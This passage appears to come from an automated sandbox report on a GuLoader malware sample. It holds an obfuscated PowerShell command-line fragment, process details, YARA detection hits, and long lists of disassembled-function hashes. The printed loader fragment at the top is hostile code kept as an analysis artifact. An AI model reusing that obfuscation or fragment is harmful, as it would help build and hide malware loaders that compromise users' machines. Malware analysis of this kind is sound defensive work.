Sharif=Olmintr Cateri [LaanernSS.ingomYA ticapsHolosyst Civil EW enersMNaphtha.Coked fTDis.quiE Temp,rxSymptomT Demihe.Phello ECymosebn EmulsiCUdvikliOLethargDProvan ICo.loqunBi.liotG Frilag]Overmod: Ov.rho:TrstespANo icess B.ggemCRudime,iDiauli,i Arbejd.ConnectgbibliogeSwitcheT CephalstrykknaTT levierS gganpI BebyrdnTrsterngSugem,k( Thia e$Stra leSScheelikGravsknR drulnmDobbeltkOenomanoTumu.usR Som.dato dkritE PengestP.raconsordstrr)Garring ');Ruttendes80 (Ridsning89 'Kultu.e$SovjetrGFlys.yrlChauvinOO.ertrdbSludderA HanderLRoadrun: For ulf CamelkURn eboenC.maenvN KakerleChemehuLudsvednFScru.uloOpsttecRFemma tML gerva= Bystat$ ndiscpS,ruktuRDataselOVibrahaJHyperdoE GyritsK Bagkl tTrk uglMBan eorA ThemedgH spitaeG ksporRFremtidEMajonseNDomsafs.demetonS Ded.cnU Peake bKons rusun.erviTKaritt R illedIBage,psNprecisigVirksom(Skaberi$AfstrafTUrb nisTAdanfejTConominEScar dldPalu amE Un bsts trafi , Michel$UdstansS elotaAPrgt gel DolomitEjeresuE Eftergn HalvtieNonreti)Udbring ');Ruttendes80 $Funnelform;"
                        Imagebase:0x580000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.4239463001.0000000008370000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.4239592864.00000000095B5000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000009.00000002.4228266092.00000000055C6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:10
                        Start time:04:59:51
                        Start date:08/10/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Executed Functions

                          Function 00007FFD9B980A7A Relevance: .5, Instructions: 544COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2144172189.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 97074df27690e092e0fe46afd34e5e303fdd3f17fc14cb473db8c304c36c2cb7
                          • Instruction ID: 86f569a3fbf493783a2147f525e28669dbcabec88173989e7f2d1326bb2f2299
                          • Opcode Fuzzy Hash: 97074df27690e092e0fe46afd34e5e303fdd3f17fc14cb473db8c304c36c2cb7
                          • Instruction Fuzzy Hash: CF023722A1EBC91FE7669B6848656647FE2EF56620F1901FFD09CC70E3DE286C45C342
                          Function 00007FFD9B98026A Relevance: .5, Instructions: 543COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2144172189.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eaf00d8e800bd0268d280fcdd5d69c07794cdde67d282afb04cc84ca579ec1f8
                          • Instruction ID: 6f56b66551ed1f0053e39232b32f686e6ed4a171dc76d6ce3a53b4950b6b61fe
                          • Opcode Fuzzy Hash: eaf00d8e800bd0268d280fcdd5d69c07794cdde67d282afb04cc84ca579ec1f8
                          • Instruction Fuzzy Hash: B6021622A1FBC91FE7A6976848652647FE1EF56620F1901FFD09CCB0E3DA296C45C342
                          Function 00007FFD9B70C6B6 Relevance: .5, Instructions: 475COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5ee2e0eb8c6f1c72d0a6463b914a99ea768fed3101002a1a658db4b97c880eed
                          • Instruction ID: aec1de95c4c03daa2a009b9b79f5aaf2a2227c81f4d26c24db09a2da85380944
                          • Opcode Fuzzy Hash: 5ee2e0eb8c6f1c72d0a6463b914a99ea768fed3101002a1a658db4b97c880eed
                          • Instruction Fuzzy Hash: 46F1A330A1DA4D8FEBA8DF28C8557E937E1FF54310F14426EE84DC72A5DB34A9418B82
                          Function 00007FFD9B70D462 Relevance: .5, Instructions: 462COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3616cf98b2fe873945ce49e0afa55cdc3ab0798cf85ee80ea85919f9834544af
                          • Instruction ID: 83a0be33afb5cb640fbc288df58238a9333422a9e1211d0b30352214fc9cfbbd
                          • Opcode Fuzzy Hash: 3616cf98b2fe873945ce49e0afa55cdc3ab0798cf85ee80ea85919f9834544af
                          • Instruction Fuzzy Hash: 6DE1A230A09B4E8FEBA8DF28C8657E977D1EF54310F14436EE84DC72A5DE74A9418B81
                          Function 00007FFD9B70F7DC Relevance: .7, Instructions: 673COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 77a9a047d6aa808af5deb71dafe49afa8ef3c52f4dc03f9829b43617f5ca3e4d
                          • Instruction ID: 4ffd6df27e260567f4d443dc1735f1b0c216255e218d41c85d8fd9193bf695bd
                          • Opcode Fuzzy Hash: 77a9a047d6aa808af5deb71dafe49afa8ef3c52f4dc03f9829b43617f5ca3e4d
                          • Instruction Fuzzy Hash: 7C327430A18A4D8FDF98DF5CC4A5AA977E1FF98300F14466ED449D72A6CB35E881CB81
                          Function 00007FFD9B7DB179 Relevance: .5, Instructions: 536COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2140693955.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 336ddf3cca67ca5db3a98164a031951242e6e085d85cf8a87b96a43c968f2953
                          • Instruction ID: 0c7f6851a7cf1630d5b5180a2200ed97b6c9ebfa76f47bd3346a7802265fe172
                          • Opcode Fuzzy Hash: 336ddf3cca67ca5db3a98164a031951242e6e085d85cf8a87b96a43c968f2953
                          • Instruction Fuzzy Hash: 0D02F771A0EB894FEB65DB6848A55687BE1EF95350B0902FED04DCB2F3DD28AC498341
                          Function 00007FFD9B7D48B8 Relevance: .4, Instructions: 426COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2140693955.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a4c2459940880adee484cd38bc91beb4ae43c55599cf4f2e8475dadb4e6cc014
                          • Instruction ID: f7562ac5b35cfa826ed2b4f70ba2744c9146588a2529231cc798c8430ddd506d
                          • Opcode Fuzzy Hash: a4c2459940880adee484cd38bc91beb4ae43c55599cf4f2e8475dadb4e6cc014
                          • Instruction Fuzzy Hash: C8C1E722B0EB890FE7A9976888656757BD1EFD6350B0903BED49DC71F3DD18A8098342
                          Function 00007FFD9B7D733A Relevance: .4, Instructions: 408COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2140693955.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 73837ee9a2ae6a2200eb3bebdffb7ad6f83e8e5a36c46c13f6bc8ae9830d59ba
                          • Instruction ID: a8caf80987141a30f27c541482a2ea32c23850205081c5ea34c84193a6e31484
                          • Opcode Fuzzy Hash: 73837ee9a2ae6a2200eb3bebdffb7ad6f83e8e5a36c46c13f6bc8ae9830d59ba
                          • Instruction Fuzzy Hash: F3C14A32B0FB8E1FEBA5A7A848655B97B91EF95350B0903FED45DC70F3D918A9088341
                          Function 00007FFD9B70D076 Relevance: .3, Instructions: 335COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc230b7790233a412c1c7b87b89f9d25bc75083431dc5f001bb52ec9ec56a76a
                          • Instruction ID: 481942bf48f845fa48f7d15a3d04c315b6917d54b57fa3d2ed8fd989d9f10d5d
                          • Opcode Fuzzy Hash: fc230b7790233a412c1c7b87b89f9d25bc75083431dc5f001bb52ec9ec56a76a
                          • Instruction Fuzzy Hash: 27B1B630609B4D8FDB68DF28D8657E93BD1FF55310F14426EE88DC72A2CE7499418B82
                          Function 00007FFD9B98080A Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2144172189.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3b1e22a15dd339d985bb1359884b596ea4d40d2582a0823e9c84b139e17cbf64
                          • Instruction ID: 0e0cc0da8ec6f4f4150009493fead593cf133c545b354ebd306145fd526f8946
                          • Opcode Fuzzy Hash: 3b1e22a15dd339d985bb1359884b596ea4d40d2582a0823e9c84b139e17cbf64
                          • Instruction Fuzzy Hash: 3461E622A1FBC95FEB6397A858615A47FF0DF56610B0A01FBD08CCB0E3D9199D49C392
                          Function 00007FFD9B980050 Relevance: .2, Instructions: 170COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2144172189.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f8f90bea6bb221070d19f8142fffaad49d9caef204e32c79af7952ff4cf0425
                          • Instruction ID: d51521c4ed970eb3599076021b0756e9141a4bc217dac6ffa7ca0061b614a133
                          • Opcode Fuzzy Hash: 9f8f90bea6bb221070d19f8142fffaad49d9caef204e32c79af7952ff4cf0425
                          • Instruction Fuzzy Hash: 6F51F722B1EE8D5FEBA2DBA844605A57BE1EF56710B0901FBD49CC71E3D924AD05C341
                          Function 00007FFD9B7D49E4 Relevance: .1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2140693955.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 351836b0a9fa95019e8ea4b918fd4f8857f92f65b8947b56ac4c9ae3d4058401
                          • Instruction ID: 6430dff6b279bed219b4759f07040f223f6956d430bade873f3b0fc9ed89f96d
                          • Opcode Fuzzy Hash: 351836b0a9fa95019e8ea4b918fd4f8857f92f65b8947b56ac4c9ae3d4058401
                          • Instruction Fuzzy Hash: EF21DF22B0FB8E0BE7B597A994A517476C2EFC1390B4A03BED05DC71F6ED18AC098345
                          Function 00007FFD9B70CB74 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d7ae93f1c22c662f9d2337a3b961de87a7f77ebdf4a442ae3a3efbdd145924a6
                          • Instruction ID: 183a9c48da7ee0a53a87dcbcff27ce0bb8aabcb84b9ee595417f1462ac3bab9d
                          • Opcode Fuzzy Hash: d7ae93f1c22c662f9d2337a3b961de87a7f77ebdf4a442ae3a3efbdd145924a6
                          • Instruction Fuzzy Hash: 7331F030A1A64D8EFBB89F64CC65BF93291FF41319F41423AD44DC60F2CA786A85CB51
                          Function 00007FFD9B7D1A7F Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2140693955.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b7d0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a5888eb9694a601c43037f17be3196821b39486f4a683aab5277ac43270bc24
                          • Instruction ID: f32215d4cc0a60fb8d11f01cac54f8dba83fef3ffcf6d00db903de8389015907
                          • Opcode Fuzzy Hash: 3a5888eb9694a601c43037f17be3196821b39486f4a683aab5277ac43270bc24
                          • Instruction Fuzzy Hash: F4219F63F0F7CA0FE7A1A66818651647AD19FD6690B0A07BBD09CCB1F3D8185C498351
                          Function 00007FFD9B7041E5 Relevance: .0, Instructions: 49COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.2139977472.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b700000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                          • Instruction ID: 5bcb71ee52f823b82f3ba7486285d421ab14aba17b48ecd7b7618d5a97259e52
                          • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                          • Instruction Fuzzy Hash: B101843020CB0C4FD748EF4CE051AA5B3E0FB95324F10056EE58AC36A5D622E882CB41

                          Executed Functions

                          Function 0439F0C0 Relevance: .3, Instructions: 281COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 626b9c27c5a0a89496582f1228f44bafb9751b115be6aea51584dca2c6303c7c
                          • Instruction ID: 6aa85b5b8f1fcb49ed4f6436d84cc23a32593f1e476fa107a7c7ac1ba70efa69
                          • Opcode Fuzzy Hash: 626b9c27c5a0a89496582f1228f44bafb9751b115be6aea51584dca2c6303c7c
                          • Instruction Fuzzy Hash: 38B16E75E10209DFDF14CFA9C8857AEBBF2AF88314F149129D819E7294EB74AC45CB81
                          Function 0439F990 Relevance: .3, Instructions: 266COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d072a46753af5c90c6c3db3fd206a6ac31a297148c1edbf5ab8b26665649b85f
                          • Instruction ID: 7715d4c9253bd9e3e84396fa15aa0c2732372ab791c5a37c5265e75d01adf082
                          • Opcode Fuzzy Hash: d072a46753af5c90c6c3db3fd206a6ac31a297148c1edbf5ab8b26665649b85f
                          • Instruction Fuzzy Hash: 7BB15E70E10209DFDF10CFA9D8957ADBBF2AF88314F149529D819EB294EB74A845CF81
                          Function 072266A8 Relevance: 15.8, Strings: 12, Instructions: 803COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                          • API String ID: 0-242022331
                          • Opcode ID: 15e1c5ee520c5f63242da40fe0425006e7f08935a871e00e89b3688b2b868442
                          • Instruction ID: 446300c91b68e579c822bd30c92322f32132ce157ba4ab61b0d40d5eb3b03526
                          • Opcode Fuzzy Hash: 15e1c5ee520c5f63242da40fe0425006e7f08935a871e00e89b3688b2b868442
                          • Instruction Fuzzy Hash: A36290B4A10219DFCB18DB68C951B9EBBB2BB84304F10C1A9D905AF795CB71DC86CB91
                          Function 072252C0 Relevance: 13.3, Strings: 10, Instructions: 792COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$(f$l$(f$l$(f$l$(f$l$4'^q$4'^q$4'^q$4'^q
                          • API String ID: 0-1610741605
                          • Opcode ID: 151f3bccba2ec7e4d6e1cc461d1c75aad20adc63fff5eca657213b8c2191529f
                          • Instruction ID: 21884300bd5c36000eab872bb030796cf60d2baeb790921a138f99ca605eb054
                          • Opcode Fuzzy Hash: 151f3bccba2ec7e4d6e1cc461d1c75aad20adc63fff5eca657213b8c2191529f
                          • Instruction Fuzzy Hash: D0627CB0B10219EFDB14CF99C445A9ABBB2BF84304F24C1A9D905AF759CB76DC46CB81
                          Function 072252A3 Relevance: 5.6, Strings: 4, Instructions: 606COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$4'^q$4'^q
                          • API String ID: 0-3427128107
                          • Opcode ID: 799c31c6e97ace9f4aa6e5ad9ba4c983c7956f88bb71007719d7f54bf59a93ce
                          • Instruction ID: 03e2741afbbd42e9dfe175b11553b3bccc7fa941587261e911657eb1426e2be4
                          • Opcode Fuzzy Hash: 799c31c6e97ace9f4aa6e5ad9ba4c983c7956f88bb71007719d7f54bf59a93ce
                          • Instruction Fuzzy Hash: 0D4269B4A10215AFDB14CF99C481E99FBB2BF88314F24C1A9D905AF355CB76EC46CB81
                          Function 07227313 Relevance: 5.5, Strings: 4, Instructions: 458COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$4'^q$4'^q$4'^q
                          • API String ID: 0-1258739229
                          • Opcode ID: 8e02b487a0c65dfe4db9196f8c35def43c93d7641a4f31b74bf2e4c1a5f8444a
                          • Instruction ID: d1e053fe4b97f31c1c3720dabbc1c1313453fb3cb9e9259665ea1ea62e1e2a69
                          • Opcode Fuzzy Hash: 8e02b487a0c65dfe4db9196f8c35def43c93d7641a4f31b74bf2e4c1a5f8444a
                          • Instruction Fuzzy Hash: DF129FB4A14219EFCB14DB58C851BAEBBB2BF85304F14C099DA05AF395CB71DC82DB91
                          Function 07226D23 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l$4'^q$4'^q
                          • API String ID: 0-3427128107
                          • Opcode ID: 6d1cc54d269c83cad3a39c5040506957d68a5f0ac5970dd543f1628fe17682c4
                          • Instruction ID: 2b8ad8e34ccb3bd5c67dbcaf921906a146ac4112c682760734aba1ebeedbd1ab
                          • Opcode Fuzzy Hash: 6d1cc54d269c83cad3a39c5040506957d68a5f0ac5970dd543f1628fe17682c4
                          • Instruction Fuzzy Hash: C0F1B5B0A102199FCB24DB58CD51FAABBB2EF84304F10C1A5DA09AF795CB71DD858F91
                          Function 0439B5D0 Relevance: 4.3, Strings: 3, Instructions: 519COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4213890224.0000000004390000.00000040.00000800.00020000.00000000.sdmp, Offset: 04390000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_4390000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: Hbq$$^q$$^q
                          • API String ID: 0-1611274095
                          • Opcode ID: cde3f66b7cc368ceedf745a6692d6d1d9be139ebfe0477d1c48e7cf1091fd182
                          • Instruction ID: 256c2e6e33fc2638caad018d1a58c05834871870f207a5e81521d0b897d959dd
                          • Opcode Fuzzy Hash: cde3f66b7cc368ceedf745a6692d6d1d9be139ebfe0477d1c48e7cf1091fd182
                          • Instruction Fuzzy Hash: 59226D30B002588FDF25DB24D854AAEB7F6BF89301F1554A9D40AAB351DF35AD86CF81
                          Function 07225B16 Relevance: 4.2, Strings: 3, Instructions: 482COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$4'^q$4'^q
                          • API String ID: 0-3222629440
                          • Opcode ID: bb63215f1a3a5b871d86e54d444d440a4711474d6727cf0cafc7bb55237e6974
                          • Instruction ID: b9f11de6b233b86ef8f6f0daad22b945b30009e85d19351a3678854d89a33dc4
                          • Opcode Fuzzy Hash: bb63215f1a3a5b871d86e54d444d440a4711474d6727cf0cafc7bb55237e6974
                          • Instruction Fuzzy Hash: B9128DB0A10215EFDB14CF99C445E9ABBB2FB84314F14C0A9D905AF795CB76EC46CB81
                          Function 07221070 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $^q$$^q$$^q
                          • API String ID: 0-831282457
                          • Opcode ID: 1bc5a46e5120a6feaed903bd394a1061b2d8fe78eef7cb39cf84edcc051278f7
                          • Instruction ID: daf586f93d0ef7e78ce29664d24b5cf6971c652d1d1e0b931b83dca01136597b
                          • Opcode Fuzzy Hash: 1bc5a46e5120a6feaed903bd394a1061b2d8fe78eef7cb39cf84edcc051278f7
                          • Instruction Fuzzy Hash: 19214CB173026F7BDB38596A8801F37B6DA9BC4710F34843BA905CB385DDB5C5569360
                          Function 07224F18 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: (f$l$(f$l
                          • API String ID: 0-621886165
                          • Opcode ID: a89e4377cf92f5fee0db739a19ee2045c58ec8d05fade13fd607e44229e8614e
                          • Instruction ID: 1931bd781d0ab88b72f9e7b942aefdfe9fd9d7ee430dfb7d6ab86c2d569cb353
                          • Opcode Fuzzy Hash: a89e4377cf92f5fee0db739a19ee2045c58ec8d05fade13fd607e44229e8614e
                          • Instruction Fuzzy Hash: AA9181B0B50219EFCB14DB69C951B9EBBA3EB88300F10C169E9056F795CB72DC42CB91
                          Function 07228113 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q
                          • API String ID: 0-2697143702
                          • Opcode ID: 795997f8f7de673fe944a84844bb482c6e82bba651b35d2b27ad1c50484537f1
                          • Instruction ID: 71e8aa2934fe07e5eba5c4c7745f24b48ed68e248aec7ddbbb03207666408251
                          • Opcode Fuzzy Hash: 795997f8f7de673fe944a84844bb482c6e82bba651b35d2b27ad1c50484537f1
                          • Instruction Fuzzy Hash: 555180F0B24267AFCB198B78C45566ABBE2AF96200B14C4A6D501CF3A6DF31C84BD351
                          Function 0722316A Relevance: 2.7, Strings: 2, Instructions: 156COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tP^q$tP^q
                          • API String ID: 0-309238000
                          • Opcode ID: 583e74053cfd0c8be39c5d9943c6468bf330b02dc110fa698b99fd10e8d6f045
                          • Instruction ID: a2111e49c27e2a258f7ca3ee1a027cc27fea143b4182ba80d6136206482d7c15
                          • Opcode Fuzzy Hash: 583e74053cfd0c8be39c5d9943c6468bf330b02dc110fa698b99fd10e8d6f045
                          • Instruction Fuzzy Hash: 765105B06193D2AFC7128B74C865A65BFB1AF87210B1DC5CBD4848F2A3CA26CC4BD751
                          Function 07228996 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'^q$4'^q
                          • API String ID: 0-2697143702
                          • Opcode ID: 11d504f0fa7594d5765ccbffc5ca454e7fde86c65cd81f9c2a1626586f21ae48
                          • Instruction ID: 95284f39780f7db465cd4e03fa5d4a245efc218a48557124907f4724de4d3559
                          • Opcode Fuzzy Hash: 11d504f0fa7594d5765ccbffc5ca454e7fde86c65cd81f9c2a1626586f21ae48
                          • Instruction Fuzzy Hash: F641C2F1724266BFCF258B7498506ABBB919FC1214B1484AACA01CF356DE32C847D362
                          Function 07221056 Relevance: 2.6, Strings: 2, Instructions: 76COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.4235157147.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7220000_powershell.jbxd
                          Similarity
